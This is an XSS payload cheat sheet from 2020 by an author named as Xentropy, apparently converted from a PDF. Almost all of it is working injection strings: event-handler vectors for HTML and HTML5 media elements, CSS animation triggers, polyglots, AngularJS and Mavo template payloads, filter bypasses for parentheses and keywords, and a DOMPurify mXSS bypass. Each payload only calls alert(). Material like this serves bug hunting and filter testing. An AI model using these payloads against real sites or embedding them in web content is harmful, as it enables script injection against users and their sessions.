XSS Cheatsheet for 2020

By: Xentropy ( @SamuelAnttila )

<<LINK TO ORIGINAL ARTICLE>>

Tag-attribute separators

Sometimes filters naively assume only certain characters can separate a tag and its attributes, here’s a full list of valid separators that work in firefox and chrome:

Decimal value URL Encoded Human desc

47 %2F Foward slash
13 %0D Carriage Return
12 %0C Form Feed
10 %0A New Line
9 %09 Horizontal Tab

Usage
Basically, if you have a payload that looks like:
<svg onload=alert(1)>
You can try to replace the space between ‘svg’ and ‘onload’ with any of those chars and still work like you expect it to:
So, these are all valid HTML and will execute (demo: <<valid html>> ):
<svg/onload=alert(1)><svg>
<svg
onload=alert(1)><svg> # newline char
<svg onload=alert(1)><svg> # tab char
<svgonload=alert(1)><svg> # new page char (0xc)

JavaScript event based XSS

Good reference for more events: <<More HTML events>>

Standard HTML events

(0-click only)

1
 Name Tags Note
onload body, iframe, img, frameset, input, script, style, link, svg Great for 0-click, but super commonly filtered
onpageshow body Great for 0-click, but appears only usable in Non-DOM injections
onfocus most tags for 0-click: use together with autofocus=“”
onmouseover most tags if possible, add styling to make it as big as possible.
onerror img, input, object, link, script, video, audio make sure to pass params to make it fail
onanimationstart Combine with any element that can be animated Fired then a CSS animation starts
onanimationend Combine with any element that can be animated Fires when a CSS animation ends
onstart marquee Fires on marquee animation start - Firefox only?
onfinish marquee Fires on marquee animation end - Firefox only?
ontoggle details Must have the ‘open’ attribute for 0-click

Examples:
<body onload=alert()>
<img src=x onerror=alert()>
<svg onload=alert()>
<body onpageshow=alert(1)>
<div style="width:1000px;height:1000px" onmouseover=alert()></div>
<marquee width=10 loop=2 behavior="alternate" onbounce=alert()> (firefox only)
<marquee onstart=alert(1)> (firefox only)
<marquee loop=1 width=0 onfinish=alert(1)> (firefox only)
<input autofocus="" onfocus=alert(1)></input>
<details open ontoggle="alert()"> (chrome & opera only)

HTML5 events
(0-click only)

Name Tags Note

onplay video, audio For 0-click: combine with autoplay HTML attribute
onplaying video, audio For 0-click: combine with autoplay HTML attribute
oncanplay video, audio Must link to a valid video/audio clip
onloadeddata video, audio Must link to a valid video/audio clip
onloadedmetadata video, audio Must link to a valid video/audio clip
onprogress video, audio Must link to a valid video/audio clip
onloadstart video, audio Great underexploited 0-click vector
oncanplay video, audio Must link to a valid video/audio clip

Examples:

2
<video autoplay onloadstart="alert()" src=x></video>
<video autoplay controls onplay="alert()">
<source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4">
</video>
<video controls onloadeddata="alert()">
<source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4">
</video>
<video controls onloadedmetadata="alert()">
<source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4">
</video>
<video controls onloadstart="alert()">
<source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4">
</video>
<video controls onloadstart="alert()">
<source src=x></video>
<video controls oncanplay="alert()">
<source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4">
</video>
<audio autoplay controls onplay="alert()">
<source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4">
</audio>
<audio autoplay controls onplaying="alert()">
<source src="http://mirrors.standaloneinstaller.com/video-sample/lion-sample.mp4">
</audio>

CSS-based events
Unfortunately, true XSS through CSS appears dead. All the vectors I’ve attempted only work on extremely old browsers. So what we’ve got is XSS that triggers based on
CSS unless you feel like arguing with devs that an IE8 or old opera vulnerability is still a valid risk.
Note: Below uses style tags to set up keyframes for animation(start|end), but you can also check for already included CSS to reuse what’s already there.
<style>@keyframes x {}</style>
<p style="animation: x;" onanimationstart="alert()">XSS</p>
<p style="animation: x;" onanimationend="alert()">XSS</p>

Weird XSS vectors

Just some odd/weird vectors that I don’t see mentioned often.

<svg><animate onbegin=alert() attributeName=x></svg>
<object data="data:text/html,<script>alert(5)</script>">
<iframe srcdoc="<svg onload=alert(4);>">

3
<object data=javascript:alert(3)>
<iframe src=javascript:alert(2)>
<embed src=javascript:alert(1)>
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+" type="image/svg+xml" AllowScriptAccess="always"></embed>
<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv
MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdod
D0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="></embed>

XSS Polyglots

I use several XSS polyglots because sometimes you only have a certain # of characters to input and need a DOM or non-DOM based one. Don’t rely on these as there are
circumstances they will fail, but if you’re fuzzing everything then polyglots can give okay coverage.

# chars Usage Polyglots

141 Both javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \"
onmouseover=/*&lt;svg/*/onload=alert()//>
88 Non- "'--></noscript></noembed></template></title></textarea></style><script>alert()</script>
DOM
95 DOM '"--></title></textarea></style></noscript></noembed></template></frameset><svg onload=alert()>
54 Non- "'>-->*/</noscript></ti tle><script>alert()</script>
DOM
42 DOM "'--></style></script><svg onload=alert()>

Frameworks

To attack JS Frameworks, always do research on the relevant templating language.

AngularJS
{% raw %}
{{constructor.constructor('alert(1)')()}}
{% endraw %}
That payload works in most cases, but this great resource has a bunch of other recommendations for various versions you may want to try.

Mavo
[self.alert(1)]

4
XSS Filter Bypasses

Parenthesis filtering
Abusing HTML parsers and JS Syntax:
<svg onload=alert`1`></svg>
<svg onload=alert&lpar;1&rpar;></svg>
<svg onload=alert&#x28;1&#x29></svg>
<svg onload=alert&#40;1&#41></svg>

Restricted charset
These 3 sites will transform valid JS to horrible monstrosities that have a good shot at bypassing a lot of filters:
• JSFuck
• JSFsck – JSFuck without parentheses
• jjencode

Keyword filtering
Avoiding keywords:
(alert)(1)
(1,2,3,4,5,6,7,8,alert)(1)
a=alert,a(1)
[1].find(alert)
top["al”+”ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1) // Generated using parseInt("alert",30). Other bases also work

mXSS and DOM Clobbering

It’s basically impossible for XSS filters to correctly anticipate every way that HTML will be mutated by a browser and interacting libraries, so what happens is that you
can sometimes sneak a XSS payload in as invalid HTML and the browser will correct it into a valid payload. . . which bypasses the filter.
mXSS paper with lots of details: here
Talk with good info on clobbering: here
mXSS payload that bypasses one of the most commonly used filters: DOMPurify <2.0.1
<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">
<svg><p><style><a id="</style><img src=1 onerror=alert(1)>"></p></svg>

5
Double encoding
Simple enough, sometimes an application will perform XSS filtering on a string before it’s decoded once more, which leaves it open by filter bypasses. It’s pretty rare, but
some bug hunters I know swear by it so I’m including it for reference.

Char Double encoded

< %253C
> %253E
( %2528
) %2529
“ %2522
’ %2527

General tips
• VaRy ThE capItaliZatiOn. Sometimes a regex or other custom-made filters do case sensitive matching.
• Practice your XSS skills on CTFs like Pwnfunction’s XSS CTF . You will likely learn techniques you did not know existed.

Resources

Great other resources:

<<Fantastic collection of somewhat old XSS stuff>>
<<Portswigger XSS cheatsheet>>
<<Portswigger XSS through Frameworks>>